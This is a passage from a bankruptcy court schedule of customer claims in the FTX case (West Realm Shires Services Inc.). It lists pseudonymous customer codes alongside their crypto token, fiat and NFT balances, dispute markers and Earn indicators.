| 07343900 | | CUSDT[1], DOGE[1.01578152], UNI[0], USD[0.00] | | |
| 07343901 | | CUSDT[7], DOGE[1144.20733551], TRX[2], USD[0.00] | Yes | |
| 07343902 | | DOGE[2], USD[0.01] | Yes | |
| 07343903 | | DOGE[696.55242968], GRT[30.0032699], LINK[1.65671896], LTC[.14763617], USD[30.00] | | |
| 07343905 | | USD[10.00] | | |
| 07343906 | | USD[10.00] | | |
| 07343907 | | DOGE[1], NFT (434398868509327667/Coachella x FTX Weekend 2 #21152)[1], USD[0.00] | | |
| 07343908 | | USD[10.00] | | |
| 07343909 | | DOGE[0], ETH[0], ETHW[0], LINK[0], USD[0.05] | | |
| 07343910 | | USD[10.00] | | |
| 07343911 | | USD[10.00] | | |
| 07343912 | Contingent, Disputed | BTC[0.01317563], USD[1.62], USDT[.5649364] | | |
| 07343913 | | DOGE[144.3635057], USD[0.04] | | |
| 07343914 | | BTC[.00014298], ETH[.00356191], ETHW[.00356191], TRX[61.30543674], USD[0.00] | | |
| 07343915 | | USD[10.00] | | |
| 07343916 | | USD[10.00] | | |
| 07343917 | | USD[10.00] | | |
| 07343918 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1], ETH[0.00000265], ETHW[0.00000265], GRT[1.00498957], SOL[0], TRX[2], UNI[0], USD[0.03], USDT[1.10790893] | Yes | |
| 07343919 | | CUSDT[4], DOGE[0], LINK[0], USD[0.01] | | |
| 07343920 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343921 | | BRZ[0], BTC[.00000895], CUSDT[12], DOGE[0], USD[0.00] | | |
| 07343922 | | USD[10.00] | | |
| 07343923 | | USD[10.00] | | |
| 07343924 | | USD[10.00] | | |
| 07343925 | | USD[10.00] | | |
| 07343926 | | CUSDT[3], DOGE[118.04939423], LINK[.00000219], LTC[.13014701], SOL[2.40474276], TRX[2], USD[0.00] | Yes | |
| 07343927 | | BAT[1.01655549], CUSDT[8], DOGE[32738.70207743], ETH[.12335429], ETHW[.12218242], SHIB[1879658.12592389], TRX[2], USD[0.02] | Yes | |
| 07343928 | | CUSDT[1], USD[0.00] | | |
| 07343929 | | DOGE[137.16533031], USD[0.00] | | |
| 07343930 | | USD[10.00] | | |
| 07343931 | | BRZ[4], CUSDT[3], DOGE[817.18531566], TRX[6], USD[0.00], USDT[0] | | |
| 07343932 | | BTC[.00002514], DOGE[0.00002161], ETH[0], USD[0.01] | | |
| 07343933 | | CUSDT[1], DOGE[777.64556364], USD[0.00] | | |
| 07343934 | | USD[0.00] | | |
| 07343935 | | USD[0.00] | | |
| 07343936 | | CUSDT[3], DOGE[210.96420795], TRX[1], USD[0.19], USDT[0] | | |
| 07343937 | | DOGE[41.75698354], TRX[1], USD[0.00] | | |
| 07343938 | | USD[10.00] | | |
| 07343940 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07343941 | | USD[10.00] | | |
| 07343943 | | BAT[1], DOGE[1], TRX[1], USD[0.00], USDT[1] | | |
| 07343944 | | USD[10.00] | | |
| 07343945 | | USD[10.00] | | |
| 07343946 | | USD[10.00] | | |
| 07343947 | | DOGE[32.01047382], USD[0.00] | | |
| 07343948 | | CUSDT[1], DOGE[65.31363433], USD[0.00] | | |
| 07343949 | | USD[0.00] | | |
| 07343951 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07343953 | | DOGE[514.19440232], USD[10.00] | | |
| 07343954 | | DOGE[1], USD[0.00] | | |
| 07343955 | | USD[10.00] | | |
| 07343956 | | DOGE[3], LINK[0], UNI[0], USD[0.00] | | |
| 07343957 | | USD[10.00] | | |
| 07343958 | | DOGE[0], USD[0.01] | | |
| 07343960 | | USD[10.00] | | |
| 07343961 | | USD[10.00] | | |
| 07343962 | | USD[0.00] | | |
| 07343963 | | BRZ[1], CUSDT[1], DOGE[1], GRT[1], LINK[0], SUSHI[0], TRX[2], USD[0.00], USDT[1] | | |
| 07343964 | | DOGE[1], USD[0.00], USDT[0.00000001] | | |
| 07343965 | | DOGE[128.67004336], ETHW[.00586509], SOL[.00418497], TRX[1], USD[0.00] | Yes | |
| 07343966 | | USD[10.00] | | |
| 07343967 | | USD[10.00] | | |
| 07343968 | | USD[10.00] | | |
| 07343969 | | DOGE[29.49848024], USD[0.00] | | |
| 07343970 | | USD[10.00] | | |
| 07343971 | | USD[10.00] | | |
| 07343972 | | BRZ[2], CUSDT[55.36327932], DOGE[9967.69745465], TRX[1], USD[0.00] | Yes | |
| 07343973 | | USD[10.00] | | |
| 07343974 | | USD[10.00] | | |
| 07343975 | | USD[10.00] | | |
| 07343976 | | BRZ[2], BTC[.00006606], CUSDT[4], DOGE[159.53065048], TRX[2], USD[0.74] | | |
| 07343977 | | DOGE[.54561916], USD[0.00] | Yes | |
| 07343978 | | CUSDT[1], GRT[12.00153888], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07343979 | | BRZ[1], CUSDT[5], USD[7.74] | | |
| 07343980 | | USD[10.00] | | |
| 07343981 | | USD[10.00] | | |
| 07343982 | | USD[10.00] | | |
| 07343983 | | GRT[5.08568316], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343984 | | DOGE[.04167573], TRX[1], USD[0.00] | Yes | |
| 07343985 | | BAT[0], BCH[0.39625813], BRZ[3], BTC[0], CUSDT[9], DOGE[2680.33606602], GRT[119.90457437], KSHIB[4131.26101929], LINK[3.47633881], SOL[16.48862458], SUSHI[6.25874424], TRX[4177.57723736], UNI[0], USD[0.00], USDT[0], YFI[0.00470383] | Yes | |
| 07343986 | | DOGE[660.88002061], ETH[.00642051], ETHW[.00642051], USD[0.00] | | |
| 07343987 | | BRZ[2], CUSDT[1], DOGE[1.38269122], USD[0.20] | | |
| 07343988 | | BRZ[1], CUSDT[1], DOGE[7.13768629], ETH[.0055413], ETHW[.0055413], TRX[1], USD[0.00] | | |
| 07343989 | | USD[260.00] | | |
| 07343990 | | USD[0.01] | | |
| 07343991 | | BRZ[1], CUSDT[1], DOGE[.00000662], TRX[1], USD[0.00] | | |
| 07343992 | | BRZ[1], CUSDT[1], TRX[3], USD[0.01] | | |
| 07343993 | | CUSDT[1], DOGE[6.64825956], USD[0.00], USDT[0] | Yes | |
| 07343994 | | USD[0.00] | | |
| 07343995 | | CUSDT[149.57201766], DOGE[403.14972929], ETH[.11594161], ETHW[.11594161], SOL[2.30601042], TRX[3], USD[9.37], USDT[12.43009179] | | |
| 07343996 | | DOGE[1258.27164153], GRT[1], TRX[1], USD[0.41] | | |
| 07343997 | | DOGE[0], SHIB[0], USD[0.00] | | |
| 07343998 | | TRX[1], USD[0.01] | | |
| 07343999 | | USD[10.00] | | |
| 07344000 | | USD[10.00] | | |
| 07344001 | | DOGE[24.8934522], USD[0.00] | | |
| 07344002 | | USD[10.00] | | |
| 07344003 | | BCH[.05039365], BRZ[1], BTC[0], CUSDT[6], ETH[.29281661], ETHW[.29262437], SOL[12.05602829], TRX[201.78900615], USD[0.00], USDT[1.10441361] | Yes | |
| 07344004 | | AVAX[124.02471171], BAT[1.01655519], BRZ[3], CUSDT[9], DOGE[19.72676578], NFT [333893824767426488/Bahrain Ticket Stub #514][1], NFT [482113234925496459/Humpty Dumpty #68][1], SOL[0.86402725], TRX[5], USD[2.61], USDT[0.00000203] | Yes | |
| 07344005 | | USD[10.00] | | |
| 07344006 | | CUSDT[1], DOGE[1], GRT[.08544412], TRX[.05981724], USD[0.12] | | |
| 07344007 | | USD[10.00] | | |
| 07344008 | | BRZ[5.07952967], BTC[.00639441], CUSDT[7], DOGE[.00000267], SHIB[1], TRX[4], USD[0.99], USDT[0] | Yes | |
| 07344009 | | USD[10.00] | | |
| 07344010 | | BRZ[6], BTC[0.00458058], CUSDT[4], DOGE[17], GRT[1], TRX[3], USD[0.00] | | |
| 07344011 | | BTC[0], CUSDT[1], ETH[0], GRT[0], USD[0.00], USDT[0.00000001] | | |
| 07344012 | | USD[0.01] | | |
| 07344013 | | DOGE[97.71308607], GRT[1.40329649], USD[10.00] | | |
| 07344015 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07344016 | | BTC[.0396], CHF[396.13], ETH[.20979], USD[1.52] | | |
| 07344018 | | USD[10.00] | | |
| 07344019 | | USD[0.01] | | |
| 07344020 | | USD[10.00] | | |
| 07344021 | | USD[10.63] | Yes | |
| 07344023 | | DOGE[.75223319], USD[0.00] | | |
| 07344024 | | USD[10.00] | | |
| 07344025 | | BRZ[1], CUSDT[10], DOGE[179.00643902], ETH[0], SOL[1.01327513], TRX[2], USD[0.23], YFI[.00013582] | | |
| 07344026 | | DOGE[5182.58135271], USD[0.00] | Yes | |
| 07344027 | | USD[10.00] | | |
| 07344028 | | DOGE[6563.24604393], USD[0.00] | Yes | |
| 07344029 | | CUSDT[2], DOGE[1], ETH[.00723356], ETHW[.00723356], USD[0.00] | | |
| 07344030 | | USD[10.00] | | |
| 07344031 | | USD[10.00] | | |
| 07344034 | | USD[10.00] | | |
| 07344035 | | BRZ[1], USD[0.00] | | |
| 07344038 | | USD[0.00] | | |
| 07344039 | | SOL[.14830757], USD[0.00] | Yes | |
| 07344040 | | BRZ[2], DOGE[2], TRX[2], USD[0.00] | | |
| 07344041 | | USD[10.00] | | |
| 07344042 | | USD[10.00] | | |
| 07344043 | | BRZ[1], CUSDT[1], DOGE[1], SOL[0.08393962], USD[100.03] | Yes | |
| 07344044 | | USD[10.00] | | |
| 07344045 | | USD[10.00] | | |
| 07344046 | | BTC[0], DOGE[.00259916], USD[0.00] | | |
| 07344047 | | DOGE[705.08042002], ETH[0], SHIB[1025735.36262611], USD[0.00], USDT[0] | Yes | |
| 07344048 | | USD[10.00] | | |

West Realm Shires Services Inc.

Case 22-11068-JTD Doc 1752 Supplemental Schedule F - Priority Unsecured Nonpriority Customer Claims Filed 06/27/23 Page 461 of 1316

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344049 | | BCH[.12961161], BRZ[4], CUSDT[3], DOGE[1050.5963396], ETH[.00000008], ETHW[.00000008], GRT[1.00498957], LTC[.00018029], SOL[14.58511924], TRX[4927.52144284], USD[0.06] | Yes | |
| 07344050 | | USD[10.00] | | |
| 07344051 | | DOGE[147.66775983], USD[0.00] | | |
| 07344052 | | BTC[.00020886], USD[0.00] | | |
| 07344053 | | USD[10.00] | | |
| 07344054 | | BTC[0], DOGE[1], USD[0.01] | | |
| 07344055 | | USD[0.00] | | |
| 07344056 | | BAT[2.128235], BRZ[3], BTC[0], DOGE[1], ETH[1.91321403], ETHW[1.91241042], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[4], USD[0.00] | Yes | |
| 07344057 | | USD[10.00] | | |
| 07344058 | | BTC[.00039069], CUSDT[3], DOGE[751.55008746], USD[0.00] | | |
| 07344060 | | USD[0.01] | | |
| 07344061 | | DOGE[.28172451], TRX[1], USD[0.29] | | |
| 07344062 | | USD[10.00] | | |
| 07344063 | | BAT[0], BTC[0], CUSDT[4], DOGE[0], ETH[0], GRT[0], LTC[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07344064 | | USD[10.00] | | |
| 07344065 | | USD[0.00] | | |
| 07344066 | | USD[0.00] | | |
| 07344067 | | BCH[.12942463], BRZ[1], CUSDT[3], DOGE[1098.80840486], GRT[22.41019701], TRX[843.56182257], USD[0.01] | Yes | |
| 07344068 | | DOGE[89.61181273], USD[0.18] | Yes | |
| 07344069 | | DOGE[4.07985495], USD[0.00] | | |
| 07344070 | | CUSDT[14], ETH[0], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07344071 | | BRZ[1], CUSDT[3], GRT[1], TRX[1], USD[111.25] | | |
| 07344072 | Contingent, Disputed | MATIC[0], USD[0.00], USDT[0] | | |
| 07344073 | | BAT[21.7445347], USD[0.00] | | |
| 07344074 | | TRX[1], USD[0.13] | | |
| 07344075 | | BAT[1], BRZ[1], BTC[.02366727], DOGE[3], ETH[1.71824769], ETHW[1.71752595], PAXG[.11038642], SHIB[7], TRX[5], USD[0.00], USDT[1.02543197] | Yes | |
| 07344077 | | USD[10.00] | | |
| 07344078 | | USD[10.00] | | |
| 07344079 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07344080 | | USD[10.91] | Yes | |
| 07344081 | | USD[10.00] | | |
| 07344082 | | BTC[.00000169], USD[0.00] | Yes | |
| 07344083 | | DOGE[32599.35241275], SHIB[8762536.74461548], USD[0.00], USDT[0] | Yes | |
| 07344084 | | BRZ[1], DOGE[38700.93697878], TRX[1], USD[0.00] | | |
| 07344085 | | AAVE[2.19586267], BAT[1], BCH[1.6471965], BRZ[449.68889185], BTC[.27807831], CUSDT[1236.93598677], DOGE[2928.89129055], ETH[2.34118885], ETHW[3.19695603], GRT[2369.16807091], LTC[20.39130301], SHIB[8323458.28615804], SOL[21.70477494], TRX[4417.57493046], USD[388.43], USDT[1.09910694] | Yes | |
| 07344086 | | CUSDT[3], DOGE[1224.03956846], ETH[.05482319], ETHW[.05482319], TRX[1], USD[0.00] | | |
| 07344087 | | DOGE[160.36620469], TRX[1], USD[0.00] | Yes | |
| 07344089 | | USD[10.00] | | |
| 07344091 | | USD[10.00] | | |
| 07344092 | Contingent, Disputed | DOGE[.00003193], USD[0.00] | | |
| 07344093 | | BF_POINT[300], BRZ[2], CUSDT[5], DOGE[3], SHIB[487.13271812], SOL[0], TRX[6], USD[6.55], USDT[0.00000936] | Yes | |
| 07344095 | | BRZ[1], CUSDT[2], DOGE[394.81923264], TRX[1], USD[0.00] | | |
| 07344096 | | USD[10.00] | | |
| 07344097 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07344098 | | USD[10.00] | | |
| 07344099 | | DOGE[151.97884819], USD[0.00] | | |
| 07344101 | | USD[10.00] | | |
| 07344102 | | USD[10.00] | | |
| 07344104 | | USD[10.00] | | |
| 07344105 | | BAT[1], BRZ[1], DOGE[5], ETHW[0], GRT[.02811794], LINK[.00050813], SHIB[3], TRX[4], USD[0.00] | Yes | |
| 07344106 | | BAT[30.21586149], CUSDT[18], DOGE[2169.62223992], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07344107 | | DOGE[55.77201805], USD[0.00] | | |
| 07344108 | | CUSDT[1], USD[0.09] | Yes | |
| 07344110 | | USD[10.00] | | |
| 07344111 | | USD[10.82] | Yes | |
| 07344112 | | USD[10.00] | | |
| 07344114 | | USD[10.00] | | |
| 07344115 | | BTC[.00010149], DOGE[146.00914659], LTC[.0440931], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344116 | | USD[10.00] | | |
| 07344117 | | BRZ[1], CUSDT[8], DOGE[1931.26139426], SHIB[3723856.72049123], TRX[.46674911], USD[0.00] | | |
| 07344118 | | CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07344119 | | BTC[.00021662], USD[0.00] | | |
| 07344120 | | ETH[.00329314], ETHW[.0032521], USD[0.00] | Yes | |
| 07344121 | | USD[10.00] | | |
| 07344122 | | USD[10.00] | | |
| 07344123 | | USD[0.00] | | |
| 07344124 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07344125 | | BF_POINT[300], CUSDT[6], DOGE[.06023233], USD[88.49] | Yes | |
| 07344127 | | USD[10.00] | | |
| 07344128 | | BAT[1], DOGE[.32042831], TRX[1], USD[0.01] | | |
| 07344129 | | USD[10.00] | | |
| 07344130 | | USD[10.00] | | |
| 07344131 | | BTC[.00020398], USD[0.00] | | |
| 07344132 | | USD[10.00] | | |
| 07344133 | | BRZ[0], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07344134 | | CUSDT[4], DOGE[1], TRX[1], USD[0.60], USDT[.0004543] | Yes | |
| 07344135 | | USD[0.00] | | |
| 07344136 | | USD[10.00] | | |
| 07344137 | | USD[10.00] | | |
| 07344138 | | USD[0.00] | Yes | |
| 07344139 | | USD[10.00] | | |
| 07344141 | | CUSDT[3], DOGE[1], SUSHI[1.62724455], USD[0.00] | Yes | |
| 07344142 | | CUSDT[3], TRX[2], USD[0.01] | | |
| 07344143 | | USD[10.00] | | |
| 07344144 | | CUSDT[2], KSHIB[4597.95205912], TRX[1], USD[0.00] | Yes | |
| 07344146 | | BTC[0.00058811], CUSDT[2], DOGE[90.04807466], USD[0.00] | | |
| 07344147 | | AVAX[1.62059146], BAT[541.45456818], DOGE[1660.17924521], GRT[2253.66384221], KSHIB[420.49739796], LTC[2.12209174], MATIC[377.39062679], NFT (400673651841329456/Hulkjouster #54)[1], NFT (479511071840666563/GSW Western Conference Finals Commemorative Banner #1603)[1], NFT (489120312073862398/GSW Western Conference Finals Commemorative Banner #1604)[1], SHIB[96], SOL[4.94805443], USHIB[327.83827843], TRX[4872.23780267], USD[0.01], USDT[1.10949859] | Yes | |
| 07344148 | | DOGE[1107.65444866], USD[0.01] | Yes | |
| 07344149 | | CUSDT[1], SHIB[65.04708652], USD[0.00] | | |
| 07344150 | | USD[10.00] | | |
| 07344151 | | USD[10.00] | | |
| 07344152 | | USD[10.00] | | |
| 07344153 | | CUSDT[3], TRX[1], UNI[.26106637], USD[0.00] | | |
| 07344154 | | USD[10.00] | | |
| 07344155 | | BAT[1], DOGE[1], LTC[.00000046], USD[0.00] | | |
| 07344156 | | USD[0.06] | | |
| 07344157 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], GRT[0], LINK[0], LTC[0], SHIB[1], TRX[0], USD[15.38], USDT[0] | | |
| 07344158 | | DOGE[38.8847953], USD[0.00] | Yes | |
| 07344160 | | USD[10.00] | | |
| 07344161 | | USD[0.38] | Yes | |
| 07344162 | | BRZ[1], CUSDT[19], DOGE[1908.39561936], TRX[4], USD[0.00] | Yes | |
| 07344163 | | USD[10.00] | | |
| 07344165 | | USD[0.00] | | |
| 07344166 | | USD[10.00] | | |
| 07344167 | | USD[10.00] | | |
| 07344168 | | DOGE[1687.32081066], USD[0.01] | | |
| 07344169 | | DOGE[1.0000301], USD[0.01] | | |
| 07344170 | | USD[10.00] | | |
| 07344171 | | USD[10.00] | | |
| 07344172 | | CUSDT[3], DOGE[1752.74490109], SHIB[561586.0032996], TRX[1], USD[0.00] | | |
| 07344173 | | BAT[1], BRZ[1], CUSDT[3], DOGE[1], GRT[2], USD[1207.71], USDT[1] | | |
| 07344174 | | BRZ[2], BTC[0], CUSDT[39], DOGE[393.33626554], ETHW[.0875526], GRT[30.02453942], SHIB[6], SOL[1.93359973], SUSHI[2.01689107], TRX[8], USD[0.00] | Yes | |
| 07344175 | | CUSDT[468.39586653], USD[0.00] | | |
| 07344176 | | USD[10.00] | | |
| 07344177 | | BTC[.00018615], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344178 | | USD[10.00] | | |
| 07344179 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], MATIC[ 99594323], SHIB[2], TRX[7.49489500], USD[0.00], USDT[0] | Yes | |
| 07344180 | | ETH[0.00011996], SHIB[25682953.93371749], USD[0.00], USDT[.002822] | | |
| 07344181 | | USD[10.00] | | |
| 07344182 | | DOGE[1], GRT[56.43036976], USD[0.00] | Yes | |
| 07344183 | | USD[10.00] | | |
| 07344184 | | BTC[.00000722], DOGE[1.46867227], GRT[.62519641], SOL[.01200219], USD[0.00], USDT[0] | | |
| 07344185 | | DOGE[2], ETH[.40379731], ETHW[.18054594], SHIB[1], USD[0.23] | Yes | |
| 07344186 | | BTC[.00205], CUSDT[1], USD[0.01] | Yes | |
| 07344188 | | USD[0.01] | | |
| 07344189 | | USD[0.00] | | |
| 07344190 | | USD[10.00] | | |
| 07344191 | | DOGE[10201.84092564], USD[820.98] | | |
| 07344192 | | USD[10.00] | | |
| 07344194 | | CUSDT[23], DOGE[3], TRX[2], USD[0.00] | Yes | |
| 07344196 | | USD[10.00] | | |
| 07344197 | | DOGE[1], TRX[1], UNI[4.06594068], USD[0.00] | | |
| 07344198 | | BAT[15.26367774], DOGE[1], USD[0.00] | | |
| 07344199 | | DOGE[1], USD[0.00] | | |
| 07344200 | | USD[10.00] | | |
| 07344201 | | USD[10.00] | | |
| 07344202 | | DOGE[26.46466643], ETH[.00557011], ETHW[.00557011], LINK[.36670866], TRX[1], USD[0.00] | | |
| 07344203 | | BTC[0], ETH[0.00056021], ETHW[0.00050242], LINK[.06388], MATIC[.16062], NFT (290630614073070612/FTX - Off The Grid Miami #4345)[1], NFT (326725216142013112/Imola Ticket Stub #72)[1], NFT (335055291783279178/Crypto Cub #2906)[1], SOL[.0092206], USD[0.87], USDT[23.31987949] | | |
| 07344204 | | BTC[0.00292487], DOGE[3144.63498875], USD[0.00] | | |
| 07344205 | | DOGE[31.25876026], USD[0.00] | | |
| 07344206 | | USD[10.00] | | |
| 07344207 | | BRZ[1], DOGE[.00003681], USD[121.68] | | |
| 07344208 | | DOGE[59.37664027], USD[0.00] | | |
| 07344209 | | USD[10.83] | Yes | |
| 07344210 | | USD[10.00] | | |
| 07344211 | | DOGE[159.13756591], TRX[1], USD[0.00] | | |
| 07344212 | | SHIB[3458.40954415], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07344213 | | CUSDT[1], ETH[0], GRT[0.00003093], SUSHI[0], TRX[14.96782885], USD[0.00] | | |
| 07344214 | | DOGE[24.45701752], USD[0.00] | | |
| 07344215 | | USD[10.00] | | |
| 07344216 | | USD[0.01] | | |
| 07344217 | | USD[0.00] | Yes | |
| 07344218 | | CUSDT[1], DOGE[1], SHIB[426465.15153101], USD[0.00] | Yes | |
| 07344219 | | USD[0.00], USDT[0] | Yes | |
| 07344220 | | USD[10.00] | | |
| 07344221 | | CUSDT[1], USD[0.01] | | |
| 07344222 | | USD[10.00] | | |
| 07344224 | | BAT[8.8651036], BCH[.00957495], BTC[.00002865], DOGE[169.59489148], ETH[.00007273], ETHW[.00007273], SOL[.60123299], UNI[0.06503308], USD[0.00] | | |
| 07344225 | | CUSDT[2], USD[0.00] | | |
| 07344226 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07344227 | | USD[0.00] | Yes | |
| 07344228 | | TRX[1], USD[0.00] | | |
| 07344229 | | CUSDT[2], DOGE[2290.08807361], TRX[586.28230389], USD[0.00] | | |
| 07344230 | | CUSDT[2], DOGE[1.06799804], USD[24.17] | | |
| 07344232 | | DOGE[195.76176546], ETH[.01817691], ETHW[.01817691], USD[0.00] | | |
| 07344233 | | AAVE[0], BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0.00000001], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT (362358463880228761/Santa )[1], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07344234 | | USD[10.00] | | |
| 07344235 | | BAT[1], BRZ[2.44513057], CAD[0.29], CUSDT[5], DOGE[20097.38849453], GRT[1], SHIB[1], TRX[3], USD[0.00] | Yes | |
| 07344236 | | BRZ[2], CUSDT[4], SHIB[17262369.31415096], TRX[1], USD[0.00] | Yes | |
| 07344237 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07344238 | | CUSDT[1], DOGE[979.10609452], USD[0.00] | Yes | |
| 07344239 | | USD[10.00] | | |
| 07344240 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344241 | | USD[10.00] | | |
| 07344242 | | USD[10.00] | | |
| 07344243 | | USD[10.00] | | |
| 07344244 | | USD[10.00] | | |
| 07344245 | | CUSDT[1], DOGE[0.00613015], USD[4.43] | Yes | |
| 07344246 | | BRZ[3], CUSDT[18], DOGE[171.20378386], SHIB[3], TRX[4], USD[0.05], USDT[1.10810122] | Yes | |
| 07344247 | | USD[0.00] | Yes | |
| 07344248 | | USD[10.00] | | |
| 07344249 | | BAT[1], BRZ[1], CUSDT[5], TRX[7], USD[0.00] | | |
| 07344250 | | USD[10.00] | | |
| 07344251 | | USD[10.00] | | |
| 07344252 | | USD[10.00] | | |
| 07344253 | | CUSDT[1], DOGE[113.73105383], USD[0.00] | | |
| 07344254 | | USD[10.00] | | |
| 07344255 | | CUSDT[8], DOGE[.30975971], USD[0.71] | | |
| 07344256 | | USD[10.00] | | |
| 07344257 | | USD[10.00] | | |
| 07344258 | | DOGE[119.58599805], SHIB[849618.67204757], USD[0.00] | | |
| 07344259 | | USD[165.70] | Yes | |
| 07344260 | | BRZ[1], CUSDT[1], DOGE[190.86300886], USD[1.58] | | |
| 07344261 | | USD[10.00] | | |
| 07344262 | | USD[0.01] | | |
| 07344263 | | USD[10.00] | | |
| 07344265 | | USD[0.91] | Yes | |
| 07344266 | | USD[10.00] | | |
| 07344267 | | CUSDT[1], DOGE[1.09329271], TRX[2], USD[0.01] | | |
| 07344268 | | USD[10.00] | | |
| 07344269 | | DOGE[1], USD[0.00] | | |
| 07344270 | | USD[10.00] | | |
| 07344271 | | BAT[2], BRZ[5], CUSDT[11], DOGE[19169.3359617], GRT[2], SOL[1], SUSHI[1], TRX[10], USD[0.00], USDT[2] | | |
| 07344272 | | BCH[0], BRZ[0.00004522], BTC[0], DOGE[1], ETH[0], LINK[0], LTC[0], TRX[1], USD[0.00] | | |
| 07344273 | | USD[10.00] | | |
| 07344274 | | BTC[0.00342657], DOGE[.00964036], SHIB[78680.58154166], TRX[1.00319335], USD[0.54] | Yes | |
| 07344275 | | CUSDT[1], DOGE[2], SHIB[314302.26024971], USD[0.00] | | |
| 07344276 | | CUSDT[1], DOGE[11.9842484], USD[0.00] | | |
| 07344277 | | USD[0.01], USDT[0.00000001] | | |
| 07344279 | | BTC[0], CUSDT[2], USD[0.92] | Yes | |
| 07344280 | | USD[10.00] | | |
| 07344281 | | DOGE[145.69079646], USD[0.00] | Yes | |
| 07344284 | | USD[10.00] | | |
| 07344285 | | USD[10.00] | | |
| 07344286 | | USD[10.00] | | |
| 07344287 | | USD[10.00] | | |
| 07344288 | | DOGE[138.75587596], USD[0.00] | | |
| 07344289 | | USD[10.00] | | |
| 07344290 | | BAT[175.13125649], BTC[.00238986], DOGE[101.89724038], ETH[.17336211], ETHW[.17336211], GRT[64.6834526], LINK[7.02180169], SOL[1.55005091], SUSHI[4.17085564], TRX[3029.05775796], UNI[7.89924436], USD[345.98], USDT[0] | | |
| 07344291 | | USD[10.00] | | |
| 07344292 | | USD[10.00] | | |
| 07344293 | | BRZ[6.55791216], CUSDT[29], DOGE[110.45720657], USD[0.00], USDT[0] | Yes | |
| 07344294 | | USD[0.01] | | |
| 07344295 | | CUSDT[1], TRX[165.34481752], USD[0.00] | | |
| 07344296 | | USD[10.00] | | |
| 07344298 | | BAT[1], CUSDT[3], DOGE[.04228424], USD[0.00] | | |
| 07344299 | | BRZ[1], CUSDT[2], TRX[2], USD[0.01] | | |
| 07344301 | | DOGE[142.44440003], USD[0.00] | | |
| 07344302 | | USD[0.00] | | |
| 07344303 | | DOGE[492.88731017], USD[0.00] | | |
| 07344304 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344305 | | USD[10.00] | | |
| 07344306 | | TRX[83.37932486], USD[0.00] | Yes | |
| 07344307 | | DOGE[39.89596181], SUSHI[.07174153], USD[0.00] | Yes | |
| 07344308 | | BAT[1], BRZ[6], CUSDT[13], GRT[2], SHIB[13219088.43476635], TRX[5], USD[0.00], USDT[2] | | |
| 07344309 | | USD[10.00] | | |
| 07344310 | | USD[10.00] | | |
| 07344312 | | USD[0.05] | | |
| 07344313 | | BAT[8.22894804], CUSDT[2], DOGE[572.96859728], SHIB[1], TRX[.58857018], USD[0.01] | Yes | |
| 07344314 | | USD[10.00] | | |
| 07344315 | | BTC[0], DOGE[1], ETH[0.05197150], ETHW[0.05197150], UNI[0], USD[10.00] | | |
| 07344316 | | CUSDT[6], DOGE[1], TRX[1], USD[0.00] | | |
| 07344317 | | DOGE[37.86124983], USD[0.00] | | |
| 07344318 | | USD[0.01] | | |
| 07344319 | | USD[10.00] | | |
| 07344320 | | CUSDT[1], DOGE[1], TRX[5], USD[0.01] | | |
| 07344321 | | ETH[.00572333], ETHW[.00572333], USD[0.00] | | |
| 07344322 | | USDT[1.66254587] | | |
| 07344323 | | BAT[.13248822], DOGE[0], ETH[0], USD[0.00] | | |
| 07344324 | | USD[10.00] | | |
| 07344325 | | USD[10.00] | | |
| 07344326 | | CUSDT[1], DOGE[214.77799127], USD[0.00] | Yes | |
| 07344327 | | BRZ[0], BTC[.00986407], CUSDT[2], DOGE[12492.24360321], ETH[.06518278], ETHW[.06437457], LINK[17.69299012], USD[1.26], USDT[1.10551353] | Yes | |
| 07344328 | | USD[10.00] | | |
| 07344329 | | BRZ[1], DOGE[152.00933887], TRX[2], USD[0.01] | | |
| 07344330 | | USD[10.00] | | |
| 07344331 | | DOGE[59926.822], USD[0.50] | | |
| 07344332 | | USD[10.00] | | |
